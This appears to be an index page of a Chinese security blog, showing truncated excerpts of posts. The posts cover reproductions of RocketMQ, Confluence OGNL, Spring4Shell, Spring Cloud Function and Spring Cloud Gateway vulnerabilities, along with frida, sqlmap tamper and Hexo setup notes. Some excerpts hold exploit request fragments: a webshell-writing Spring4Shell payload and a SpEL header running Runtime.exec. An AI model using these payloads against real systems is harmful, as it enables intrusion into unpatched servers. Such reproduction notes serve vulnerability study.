Apache RocketMQ 远程代码执行漏洞(CVE-2023-33246)
1.漏洞介绍Apache RocketMQ 存在远程命令执行漏洞(CVE-2023-33246)。RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。
2.影响版本:5.0.0 <= Apache RocketMQ < 5.1.1
4.0.0 <= Apache RocketMQ < 4.9.6
3.Idea配置1234567891011nameservermainClass:org.apache.rocketmq.namesrv.NamesrvStartupbrokermainClass:org.apache.rocketmq.broker.BrokerStartuparguments:-c F:\Code\Java\rocketmq\rocketmq\rocketmq-all-5.1.0\distribution\conf\broker.conf
POC:
123456789101112131415 ...
Chrome插件
常用工具start.me自定义首页标签等
Tampermonkey油猴脚本,功能强大!
各大视频无需会员解析、CSDN免登录查看全文、百度文库复制等等
二维码(生成及识别)识别和生成二维码,不再需要手机扫描
charset解决某些页面展示乱码问题,火狐浏览器工具栏自带修复编码功能
JavaScript and CSS Code Beautifier美化前端js、css展示,方便调试前端
JSONViewchrome默认展示json无格式,此插件可以展示json的树形结构
Save as MHTML推荐,打包页面到本地,不用再担心文章被删除了
渗透工具hack-tools常用的渗透payload
hackbar有了burp很少用了
ie tabie无法使用情况下的chrome替代插件
User-Agent SwitcherUser-Agent Switcher and Manager
User-Agent Switcher for Chrome
修改页面ua
WebSocket Test ClientWebSocket测试客户端
SwitchyOmega现在用的比较少 ...
CryptoJS获取密钥tip
CryptoJS获取加密密钥网站登录包加密
在网站资源搜索AES、DES等字符,定位加密函数并下断点
12345k.a.AES.encrypt(c()(t.data), A, { iv: q, mode: k.a.mode.CBC, padding: k.a.pad.Pkcs7 }
获取加密函数A(key)和q(iv)的值
此处密钥不是明文而是CryptoJS专有的WordArray格式
本地资源下载
npm install crypto-js
查阅资料可知,WordArray格式一般由CryptoJS.enc.Utf8.parse()方法转换原始字符串而来,由CryptoJS.enc.Utf8.stringify()方法将WordArray转换为原始字符串,那在这里使用CryptoJS.enc.Utf8.stringify()方法即可进行转换
确定WordArray格式
在CryptoJS代码中查找Crypto ...
Confluence OGNL表达式注入命令执行- CVE-2022-26134
简介Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,可以用于企业团队共享信息、文档协作、集体讨论,信息推送。
影响版本
1.3.0 <= Confluence Server and Data Center < 7.4.17
7.13.0 <= Confluence Server and Data Center < 7.13.7
7.14.0 <= Confluence Server and Data Center < 7.14.3
7.15.0 <= Confluence Server and Data Center < 7.15.2
7.16.0 <= Confluence Server and Data Center < 7.16.4
7.17.0 <= Confluence Server and Data Center < 7.17.4
7.18.0 <= Confluence Serve ...
frida hook初探
前言这段时间趁着项目较少,把APP编写和frida简单hook进行了一些学习,不过毕竟java底子比较薄弱,学习过程还是遇到了一些问题,在此进行一些记录
提前填坑
安卓启动frida前执行setenforce 0关闭SELinux,否则服务端可能起不来
frida脚本运行前要关闭Xposed hook模块,否则会提示非法指令
如果刷了面具的话需要关闭MagiskHide,否则也会报错
使用adb进行端口转发,frida默认端口27042,否则会报找不到APP adb forward
类似调试Web前端JS,frida调试APP代码是通过重载目标功能函数实现的,即调试APP中的函数,并对其进行传参调用和修改返回值等
练习下面用一个demo来解释下frida的hook,参考文章:https://www.cnblogs.com/luoyesiqiu/p/10718997.html
编写用于hook的简单APP,程序计算输入的分数,如果分数之和大于180则返回true,否则返回false
12345678910111213141516171819202122232425 ...
Spring4Shell-CVE-2022-22965
简介2022年3月30日,CNVD平台接收到蚂蚁科技集团股份有限公司报送的Spring框架远程命令执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。
影响
JDK9或以上版本系列
Spring框架或衍生的SpringBoot等框架,版本小于v5.3.18或v5.2.20
Spring JavaBean表单参数绑定需要满足一定条件
部署在Tomcat容器中,且日志记录功能开启
复现日志写马
12345678910111213GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20% ...
Spring-Cloud-Function-SpEL-RCE
简介Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。
影响版本3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
复现12345678POST /functionRouter HTTP/1.1host:127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")Content-Length: 5123
12345678POST /f ...
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行-CVE-2022-22947
简介
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
影响版本Spring Cloud Gateway < 3.1.0
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新版本
复现
添加包含恶意SpEL表达式的路由:
12345678910111213141516171819202122POST /actuator/gateway/routes/hacktest HTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept ...
Sqlmap tamper
准备
tamper
sqlmap中的模块,用于自定义编码payload绕过防护设备
本文使用tamper并不是为了绕过防护设备,而是服务端只接收编码后的数据,对于未编码的数据不会接收
查找加密算法,姿势很多,能找到就行,本次环境为rc4+base64+url编码
js2py库,用于使用python调用js
编写tamper
需要调用外部js,即获取到的js加密代码
js2py库,用于调用js
这里遇到了一些问题,开始使用的方法是eval_js(),但是该方法只能调用单函数js文件,遇到多函数的js文件会调用最后一个函数
EvalJs(),可以执行多函数js代码,例如:
123456with open('./get_key.js') as fp: js = fp.read() # ctx2 = execjs.compile(js) context = js2py.EvalJs() context.execute(js) vl5x=context.getKey(cookie) //getKey是get_key ...
Hexo&Gitpage搭建记录
基础环境
Git v2.33.0
Windows10 21H2
Node v16.14.1
SSH
搭建流程配置ssh密钥
全局配置本地git账户
123#对应github邮箱和用户名git config --global user.name "用户名"git config --global user.email "邮箱地址"
生成ssh key
12#默认生成路径在C:\Users\用户名\.ssh目录下ssh-keygen -t rsa -C "邮箱地址"
查看公钥内容,先在github添加生成的公钥
然后添加到本地信任列表,顺序不能反,否则会提示权限错误
1ssh -T git@github.com
出现 Hi xxx! You’ve successfully authenticated, but GitHub does not provide shell access 即为配置成功
新建github仓库
新建名为用户名.github.io的仓库,如下,该页面会自动认为是gitpag ...